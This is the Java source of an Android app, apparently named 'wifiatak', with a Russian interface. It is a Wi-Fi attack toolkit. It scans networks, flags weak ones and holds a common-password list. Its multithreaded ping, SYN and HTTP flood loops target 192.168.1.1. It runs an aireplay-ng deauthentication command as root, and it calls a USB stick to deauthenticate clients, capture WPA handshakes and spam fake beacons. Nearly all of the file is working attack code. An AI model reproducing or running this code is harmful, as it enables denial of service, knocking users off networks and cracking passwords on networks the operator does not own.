package org.test.wifiatak;
import android.Manifest; import android.animation.*; import android.content.*; import android.content.pm.PackageManager;
import android.net.wifi.*; import android.os.*; import android.widget.*; import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat; import androidx.core.content.ContextCompat;
import com.google.android.material.button.MaterialButton; import com.google.android.material.card.MaterialCardView;
import com.google.android.material.dialog.MaterialAlertDialogBuilder;
import com.google.android.material.textfield.TextInputEditText; import com.google.android.material.textfield.TextInputLayout;
import android.graphics.*; import android.graphics.drawable.*; import android.view.*; import android.view.animation.*;
import java.util.*; import java.io.*; import java.net.*;

public class MainActivity extends AppCompatActivity {
    private WifiManager wm; private LinearLayout list; private TextView st, sn, ss, rs;
    private ScrollView as; private Handler h = new Handler(Looper.getMainLooper());
    private boolean scan; private Map<String,String> oui = new HashMap<>();
    private List<String> wssid = new ArrayList<>(); private Set<String> wpw = new HashSet<>();
    private List<Thread> fl = new ArrayList<>(); private volatile boolean fg;
    private ScanResult sl; private List<ScanResult> ns = new ArrayList<>(); private Runnable stk;
    private BruceController br; private boolean bc, hr;
    private static final int CA=0xFF0C1029, AC=0xFF4A90D9, DA=0xFFE74C3C, SU=0xFF2ECC71, WA=0xFFF39C12, PU=0xFF9B59B6;

    @Override protected void onCreate(Bundle b) {
        super.onCreate(b);
        try { setContentView(R.layout.main); } catch (Exception e) { toast("UI error"); finish(); return; }
        wm=(WifiManager)getApplicationContext().getSystemService(Context.WIFI_SERVICE);
        if(wm==null){ toast("Wi-Fi error"); finish(); return; }
        list=findViewById(R.id.list); st=findViewById(R.id.status); as=findViewById(R.id.actionScroll);
        sn=findViewById(R.id.selectedNet); ss=findViewById(R.id.stickStatus); rs=findViewById(R.id.rootStatus);
        hr=chkRoot(); rs.setText("Root: "+(hr?"ДА":"НЕТ")); rs.setTextColor(hr?SU:0xFF808080);
        init(); req(); initB();
        try { registerReceiver(new BroadcastReceiver(){@Override public void onReceive(Context c,Intent i){if(i.getBooleanExtra(WifiManager.EXTRA_RESULTS_UPDATED,false))show();}},new IntentFilter(WifiManager.SCAN_RESULTS_AVAILABLE_ACTION)); } catch(Exception e){}
        findViewById(R.id.scan).setOnClickListener(v->{ anim(v); startS(); });
        findViewById(R.id.stop).setOnClickListener(v->{ anim(v); stopAll(); });
        findViewById(R.id.connectStick).setOnClickListener(v->{ anim(v); connS(); });
        int[] ids={R.id.btnCheckPass,R.id.btnStress,R.id.btnARP,R.id.btnDNS,R.id.btnPing,R.id.btnSYN,R.id.btnHTTP,R.id.btnPort,R.id.btnDeauth,R.id.btnStickScan,R.id.btnStickDeauth,R.id.btnStickHand,R.id.btnStickBeacon};
        View.OnClickListener[] acts={v->chkP(),v->strT(),v->arpS(),v->dnsS(),v->pf(),v->sf(),v->hf(),v->poS(),v->dr(),v->sSc(),v->sDe(),v->sHa(),v->sBe()};
        for(int i=0;i<ids.length;i++){ View btn=findViewById(ids[i]); if(btn!=null) btn.setOnClickListener(acts[i]); }
        updBtns(); animEn();
    }
    private void animEn() { View t=findViewById(R.id.titleText); if(t!=null){ t.setAlpha(0); t.animate().alpha(1).setDuration(800).start(); } }
    private void initB(){ try{br=new BruceController(this);bc=false;}catch(Exception e){br=null;} }
    private void connS(){ if(br==null){toast("USB error");return;} ss.setText("Поиск..."); ss.setTextColor(WA); new Thread(()->{try{boolean o=br.connect();bc=o;h.post(()->{ss.setText("Стик: "+(o?"OK":"нет"));ss.setTextColor(o?SU:DA);updBtns();});}catch(Exception e){h.post(()->{ss.setText("Стик: err");ss.setTextColor(DA);});}}).start(); }
    private void updBtns(){ setB(R.id.btnStickScan,bc); setB(R.id.btnStickDeauth,bc); setB(R.id.btnStickHand,bc); setB(R.id.btnStickBeacon,bc); setB(R.id.btnDeauth,hr); }
    private void setB(int id,boolean en){View v=findViewById(id);if(v!=null){v.setEnabled(en);v.setAlpha(en?1f:0.4f);}}
    private boolean chkRoot(){try{Process p=Runtime.getRuntime().exec("su -c id");BufferedReader r=new BufferedReader(new InputStreamReader(p.getInputStream()));String l=r.readLine();p.waitFor();return l!=null&&l.contains("uid=0");}catch(Exception e){return false;}}
    private void anim(View v){if(v==null)return;try{ObjectAnimator.ofFloat(v,"scaleX",1f,0.93f,1f).setDuration(120).start();ObjectAnimator.ofFloat(v,"scaleY",1f,0.93f,1f).setDuration(120).start();}catch(Exception e){}}
    private void req(){try{if(Build.VERSION.SDK_INT>=23){String[]p={Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.ACCESS_WIFI_STATE,Manifest.permission.CHANGE_WIFI_STATE,Manifest.permission.INTERNET};for(String x:p)if(ContextCompat.checkSelfPermission(this,x)!=PackageManager.PERMISSION_GRANTED){ActivityCompat.requestPermissions(this,p,1);break;}}}catch(Exception e){}}
    private void init(){String[][]d={{"F0:9F:C2","Ubiquiti"},{"D4:6E:35","Huawei"},{"B4:0C:25","Samsung"},{"00:1A:2B","Intel"},{"00:1B:63","Apple"},{"C0:25:A2","TP-Link"},{"E0:CB:BC","ASUS"},{"A4:2B:8C","Xiaomi"},{"70:4C:A5","D-Link"},{"14:CC:20","Netgear"},{"00:1C:DF","Belkin"},{"B0:BE:76","Tenda"}};for(String[]x:d)oui.put(x[0],x[1]);Collections.addAll(wssid,"TP-Link","ASUS","D-Link","NETGEAR","ZyXEL","Xiaomi","Huawei","Keenetic","MGTS","Beeline","Rostelecom");Collections.addAll(wpw,"12345678","password","123456789","12345","1234567890","qwerty","admin","wifi","1234567","11111111","123123","abc123","letmein","monkey","dragon","master","1234","00000000","iloveyou");}
    private void startS(){try{if(ActivityCompat.checkSelfPermission(this,Manifest.permission.ACCESS_FINE_LOCATION)!=PackageManager.PERMISSION_GRANTED){new MaterialAlertDialogBuilder(this).setTitle("Разрешение").setMessage("Нужна геолокация").setPositiveButton("Дать",(d,i)->req()).setNegativeButton("Отмена",null).show();return;}scan=true;fg=false;st.setText("Сканирование...");st.setTextColor(Color.WHITE);if(!wm.isWifiEnabled())wm.setWifiEnabled(true);wm.startScan();if(stk!=null)h.removeCallbacks(stk);stk=()->{if(scan&&ActivityCompat.checkSelfPermission(this,Manifest.permission.ACCESS_FINE_LOCATION)==PackageManager.PERMISSION_GRANTED){wm.startScan();h.postDelayed(stk,5000);}};h.postDelayed(stk,5000);}catch(Exception e){st.setText("Ошибка");st.setTextColor(DA);}}
    private void show(){try{if(ActivityCompat.checkSelfPermission(this,Manifest.permission.ACCESS_FINE_LOCATION)!=PackageManager.PERMISSION_GRANTED)return;ns=wm.getScanResults();list.removeAllViews();if(ns==null||ns.isEmpty()){st.setText("Сети не найдены");st.setTextColor(Color.GRAY);return;}st.setText("Найдено: "+ns.size());st.setTextColor(SU);Collections.sort(ns,(a,b)->b.level-a.level);for(ScanResult r:ns)if(r!=null)list.addView(card(r));}catch(Exception e){st.setText("Ошибка");st.setTextColor(DA);}}
    private View card(ScanResult r){try{MaterialCardView c=new MaterialCardView(this);c.setCardBackgroundColor(CA);c.setRadius(20);c.setCardElevation(6);c.setStrokeWidth(0);LinearLayout.LayoutParams cp=new LinearLayout.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT,ViewGroup.LayoutParams.WRAP_CONTENT);cp.setMargins(4,6,4,6);c.setLayoutParams(cp);c.setOnClickListener(v->{anim(c);sel(r);});LinearLayout row=new LinearLayout(this);row.setOrientation(LinearLayout.HORIZONTAL);row.setPadding(14,12,14,12);String enc=getE(r.capabilities);boolean wps=r.capabilities!=null&&r.capabilities.toUpperCase().contains("WPS");boolean weak=false;String sl2=(r.SSID!=null)?r.SSID.toLowerCase():"";for(String s:wssid){if(sl2.contains(s.toLowerCase())){weak=true;break;}}int col=(enc.equals("WEP")||enc.equals("Open")||wps)?DA:(enc.equals("WPA2")&&weak)?WA:enc.equals("WPA3")?SU:0xFF808080;String icon=wps||enc.equals("WEP")?"🔴":enc.equals("WPA2")&&weak?"🟡":enc.equals("WPA3")?"🟢":"⚪";View bar=new View(this);LinearLayout.LayoutParams bp=new LinearLayout.LayoutParams(6,ViewGroup.LayoutParams.MATCH_PARENT);bp.setMargins(0,0,14,0);bar.setLayoutParams(bp);GradientDrawable gd=new GradientDrawable(GradientDrawable.Orientation.TOP_BOTTOM,new int[]{col,light(col)});gd.setCornerRadius(3);bar.setBackground(gd);row.addView(bar);LinearLayout cl=new LinearLayout(this);cl.setOrientation(LinearLayout.VERTICAL);TextView ssid=new TextView(this);ssid.setText(icon+" "+(r.SSID!=null&&!r.SSID.isEmpty()?r.SSID:"Скрытая"));ssid.setTextColor(Color.WHITE);ssid.setTextSize(14);ssid.setTypeface(null,Typeface.BOLD);cl.addView(ssid);TextView info=new TextView(this);info.setText(r.level+" dBm * Канал "+getCh(r.frequency)+" * "+look(r.BSSID));info.setTextColor(0xFF8899AA);info.setTextSize(11);info.setPadding(0,4,0,0);cl.addView(info);LinearLayout sr=new LinearLayout(this);sr.setOrientation(LinearLayout.HORIZONTAL);sr.setPadding(0,8,0,0);View sbg=new View(this);sbg.setLayoutParams(new LinearLayout.LayoutParams(100,5));sbg.setBackgroundColor(0xFF1A2035);sr.addView(sbg);int sw=(int)((Math.max(-100,Math.min(r.level,0))+100)/100f*100);View sbr=new View(this);LinearLayout.LayoutParams sbb=new LinearLayout.LayoutParams(sw,5);sbb.setMargins(-100,0,0,0);sbr.setLayoutParams(sbb);sbr.setBackgroundColor(col);sr.addView(sbr);cl.addView(sr);row.addView(cl);c.addView(row);return c;}catch(Exception e){TextView tv=new TextView(this);tv.setText("Err");tv.setTextColor(DA);return tv;}}
    private int light(int c){try{float[]h=new float[3];Color.colorToHSV(c,h);h[2]=Math.min(1,h[2]*1.3f);return Color.HSVToColor(h);}catch(Exception e){return c;}}
    private void sel(ScanResult r){try{sl=r;sn.setText("🎯 "+(r.SSID!=null&&!r.SSID.isEmpty()?r.SSID:"Сеть"));sn.setTextColor(AC);as.setVisibility(View.VISIBLE);as.setAlpha(0);as.animate().alpha(1).setDuration(300).start();st.setText("Выбрана: "+(r.SSID!=null?r.SSID:"сеть"));st.setTextColor(AC);}catch(Exception e){}}
    private String getE(String c){if(c==null)return"?";try{if(c.contains("WPA3"))return"WPA3";if(c.contains("WPA2"))return"WPA2";if(c.contains("WPA"))return"WPA";if(c.contains("WEP"))return"WEP";if(c.contains("ESS"))return"Open";}catch(Exception e){}return"?";}
    private int getCh(int f){try{if(f>=2412&&f<=2484)return(f-2412)/5+1;if(f>=5180&&f<=5825)return(f-5180)/5+36;}catch(Exception e){}return 0;}
    private String look(String m){if(m==null||m.length()<8)return"?";try{String p=m.substring(0,8).toUpperCase();return oui.getOrDefault(p,"Неизв.");}catch(Exception e){return"?";}}
    private void chkP(){try{if(sl==null){toast("Выберите сеть");return;}TextInputLayout til=new TextInputLayout(this);til.setBoxBackgroundColor(CA);TextInputEditText inp=new TextInputEditText(this);inp.setTextColor(Color.WHITE);inp.setInputType(129);til.addView(inp);new MaterialAlertDialogBuilder(this).setTitle("Проверка пароля").setView(til).setPositiveButton("Проверить",(d,i)->{String pw=inp.getText().toString().trim();String res=pw.isEmpty()?"Введите":wpw.contains(pw.toLowerCase())?"Слабый":pw.length()>=12?"Надёжный":pw.length()>=8?"Средний":"Слабый";toast(res);}).setNegativeButton("Отмена",null).show();}catch(Exception e){toast("Ошибка");}}
    private void strT(){try{if(sl==null){toast("Выберите сеть");return;}st.setText("Стресс-тест...");st.setTextColor(WA);new Thread(()->{int ok=0;long t=0;for(int i=0;i<50;i++){try{long s=System.currentTimeMillis();if(Runtime.getRuntime().exec("ping -c 1 -W 1 192.168.1.1").waitFor()==0){t+=System.currentTimeMillis()-s;ok++;}}catch(Exception e){}}final String r=ok>0?"avg="+(t/ok)+"ms loss="+(50-ok)*2+"%":"Нет ответа";h.post(()->{st.setText(r);st.setTextColor((50-ok)*2<10?SU:(50-ok)*2<50?WA:DA);});}).start();}catch(Exception e){st.setText("Ошибка");}}
    private void arpS(){try{st.setText("ARP-скан...");st.setTextColor(Color.WHITE);new Thread(()->{StringBuilder sb=new StringBuilder();try{BufferedReader br=new BufferedReader(new FileReader("/proc/net/arp"));String l;boolean f=true;while((l=br.readLine())!=null){if(f){f=false;continue;}String[]p=l.trim().split("\\s+");if(p.length>=4)sb.append(p[0]).append(" -> ").append(p[3]).append("\n");}br.close();}catch(Exception e){sb.append("Ошибка");}if(sb.length()==0)sb.append("Нет устройств");final String r=sb.toString();h.post(()->{list.removeAllViews();TextView tv=new TextView(MainActivity.this);tv.setText(r);tv.setTextColor(Color.WHITE);tv.setPadding(20,20,20,20);list.addView(tv);st.setText("Устройства в сети");st.setTextColor(SU);});}).start();}catch(Exception e){st.setText("Ошибка");}}
    private void pf(){startF("Ping",()->{try{Runtime.getRuntime().exec(new String[]{"ping","-c","1","-W","0.1","-s","65500","192.168.1.1"}).waitFor();}catch(Exception e){}},50);}
    private void sf(){startF("SYN",()->{try{new Socket().connect(new InetSocketAddress("192.168.1.1",80),100);}catch(Exception e){}},100);}
    private void hf(){startF("HTTP",()->{try{HttpURLConnection c=(HttpURLConnection)new URL("http://192.168.1.1").openConnection();c.setConnectTimeout(200);c.connect();c.getInputStream().close();}catch(Exception e){}},50);}
    private void startF(String name,Runnable task,int threads){try{if(sl==null){toast("Выберите сеть");return;}stopFl();fg=true;st.setText(name+"...");st.setTextColor(DA);for(int i=0;i<threads;i++){Thread t=new Thread(()->{while(fg&&!Thread.interrupted())task.run();});t.setDaemon(true);t.start();fl.add(t);}}catch(Exception e){st.setText("Ошибка");}}
    private void dnsS(){try{st.setText("DNS...");st.setTextColor(PU);new Thread(()->{StringBuilder sb=new StringBuilder();for(String x:new String[]{"google.com","youtube.com","t.me","github.com","vk.com","ya.ru"}){try{InetAddress.getByName(x);sb.append("OK "+x+"\n");}catch(Exception e){sb.append("FAIL "+x+"\n");}}final String r=sb.toString();h.post(()->{list.removeAllViews();TextView tv=new TextView(MainActivity.this);tv.setText(r);tv.setTextColor(Color.WHITE);tv.setPadding(20,20,20,20);list.addView(tv);st.setText("DNS ok");st.setTextColor(SU);});}).start();}catch(Exception e){st.setText("Ошибка");}}
    private void poS(){try{st.setText("Порты...");st.setTextColor(PU);new Thread(()->{StringBuilder sb=new StringBuilder();for(int x:new int[]{80,443,22,21,8080,8443,3389,53}){try{new Socket().connect(new InetSocketAddress("192.168.1.1",x),200);sb.append("OPEN "+x+"\n");}catch(Exception e){sb.append("CLOSED "+x+"\n");}}final String r=sb.toString();h.post(()->{list.removeAllViews();TextView tv=new TextView(MainActivity.this);tv.setText(r);tv.setTextColor(Color.WHITE);tv.setPadding(20,20,20,20);list.addView(tv);st.setText("Ports ok");st.setTextColor(SU);});}).start();}catch(Exception e){st.setText("Ошибка");}}
    private void dr(){try{if(!hr){toast("Нужен root");return;}if(sl==null){toast("Выберите сеть");return;}st.setText("Deauth...");st.setTextColor(DA);new Thread(()->{try{Process p=Runtime.getRuntime().exec(new String[]{"su","-c","aireplay-ng -0 100 -a "+sl.BSSID+" wlan0"});p.waitFor();h.post(()->{st.setText("Deauth ok");st.setTextColor(SU);});}catch(Exception e){h.post(()->{st.setText("Ошибка");st.setTextColor(DA);});}}).start();}catch(Exception e){st.setText("Ошибка");}}
    private void sSc(){if(!bc||br==null){toast("Подключите стик");return;}st.setText("Скан...");st.setTextColor(PU);new Thread(()->{try{String r=br.scan();h.post(()->{list.removeAllViews();TextView tv=new TextView(MainActivity.this);tv.setText(r);tv.setTextColor(Color.WHITE);tv.setPadding(20,20,20,20);list.addView(tv);st.setText("Скан ok");st.setTextColor(SU);});}catch(Exception e){h.post(()->{st.setText("Ошибка");st.setTextColor(DA);});}}).start();}
    private void sDe(){if(!bc||br==null){toast("Подключите стик");return;}if(sl==null){toast("Выберите сеть");return;}st.setText("Deauth...");st.setTextColor(DA);new Thread(()->{try{String r=br.deauth(sl.BSSID,getCh(sl.frequency),100);h.post(()->{st.setText(r);st.setTextColor(SU);});}catch(Exception e){h.post(()->{st.setText("Ошибка");st.setTextColor(DA);});}}).start();}
    private void sHa(){if(!bc||br==null){toast("Подключите стик");return;}if(sl==null){toast("Выберите сеть");return;}st.setText("Handshake...");st.setTextColor(PU);new Thread(()->{try{String r=br.handshake(sl.BSSID,getCh(sl.frequency),60);h.post(()->{st.setText(r);st.setTextColor(SU);});}catch(Exception e){h.post(()->{st.setText("Ошибка");st.setTextColor(DA);});}}).start();}
    private void sBe(){if(!bc||br==null){toast("Подключите стик");return;}st.setText("Beacon...");st.setTextColor(PU);new Thread(()->{try{String r=br.beacon(100);h.post(()->{st.setText(r);st.setTextColor(SU);});}catch(Exception e){h.post(()->{st.setText("Ошибка");st.setTextColor(DA);});}}).start();}
    private void stopFl(){try{fg=false;for(Thread t:fl)if(t!=null&&t.isAlive())t.interrupt();fl.clear();}catch(Exception e){}}
    private void stopAll(){try{scan=false;stopFl();if(stk!=null)h.removeCallbacks(stk);as.setVisibility(View.GONE);sl=null;list.removeAllViews();st.setText("Готов");st.setTextColor(0xFF8899AA);}catch(Exception e){}}
    private void toast(String msg){try{Toast.makeText(this,msg,Toast.LENGTH_SHORT).show();}catch(Exception e){}}
    @Override protected void onDestroy(){stopAll();try{if(br!=null)br.close();}catch(Exception e){}super.onDestroy();}
}